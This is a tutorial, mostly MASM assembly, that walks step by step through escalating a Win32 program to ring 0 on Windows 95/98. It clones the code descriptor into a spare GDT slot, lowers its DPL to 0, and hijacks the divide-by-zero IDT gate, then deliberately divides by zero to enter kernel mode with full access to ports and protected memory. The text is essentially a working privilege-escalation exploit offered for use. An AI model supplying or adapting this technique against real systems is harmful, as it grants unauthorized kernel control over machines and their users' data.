How To Get To CPL 0 under Windows 95.

This document describes a method to get to CPL 0 for Win32 programs under Windows 95/98. Assumptions made on an auditory are: knowledge of x86 CPU operation in protected mode; knowledge of its assembly language; knowledge of Win32 programming model (flat); knowledge of MASM syntax

  1. Get GDT base address to some variable.
  2. .data
    GdtLimit	DW ? 	; GDT limit (size-1)
    GdtBase  	DD ? 	; GDT base address
    sgdt 	fword ptr GdtLimit

  3. You need an unused GDT descriptor.
  4. More likely the last will be unused but it's a good idea to check it with a debugger. Below I assume that the last is unused (Windows writers seemed to reserve some amount of GDT descriptors for unknown reason). It will become your new code segment on level 0. NOTE: I never tested what will happen if you modify your current code descriptor. May be it will still work.

    LastSelector 	DW ? 	; Selector for the new code segment.
    movzx 	eax, GdtLimit
    xor 	eax, 7
    test 	eax, 7
    jz 	done
    and 	eax, 0FFF8h
    sub 	eax, 8
    mov 	LastSelector, ax ; store last selector value
    add 	eax, GdtBase

  5. Copy the current code descriptor to there.Now DS:EAX point to the last descriptor.

    sub 	ecx, ecx
    mov 	cx, cs
    and 	ecx, 0FFF8h
    add 	ecx, GdtBase    ; Now DS:ECX points to code descriptor
    mov 	edx, [ecx]
    mov 	[eax], edx
    mov 	edx, [ecx+4]
    mov 	[eax+4], edx   	; copy

  6. Modify access rights for the new code segment to set its DPL = 0.
  7. and 	byte ptr [eax+5], 10011111b

  8. Transfer Control To CPL 0 Segment.
  9. Now once you have your code segment with level0 privileges, you want to transfer control to it. To do so, let's modify IDT exception 0 (division by 0) gate and have it point to your code. We will use the fact that IDT is also not protected by Windows from user-level access.

    IdtLimit 	DW 	?
    IdtBase  	DD 	?
    OldInt0 	DD 	?
                 	DD 	?
    sidt 	fword ptr IdtLimit
    mov 	eax, IdtBase
    ; now we'll save original exception 0 handler.
    mov 	ecx, [eax]
    mov 	OldInt0, ecx
    mov 	ecx, [eax+4]
    mov 	OldInt0[4], ecx
    ; now modify int 0 gate to have it point to our code segment on level 0.
    mov 	cx, LastSelector
    mov 	[eax+2], cx 	; Set selector
    mov 	ecx, offset int_0_handler
    mov 	[eax], cx   	; Set low word of offset
    shr 	ecx, 16
    mov 	[eax+6], cx ; Set high word of offset
    ; Now as exception 0 gate is set, enter the gate.
    sub 	eax, eax
    div 	eax
    ; Now restore original exception 0 gate - we don't need it anymore
    mov 	eax, IdtBase
    mov 	ecx, OldInt0
    mov 	[eax], ecx
    mov 	ecx, OldInt0[4]
    mov 	[eax+4], ecx

  10. Done
    Now you have your code running on the same address but with level 0 privileges. This allows you access to all the system - I/O ports, system instructions and protected memory. you may do I/O to any port without being trapped. You may try to trap other's accesses to ports setting hardware breakpoints on ports (for Pentium or more recent CPU only).

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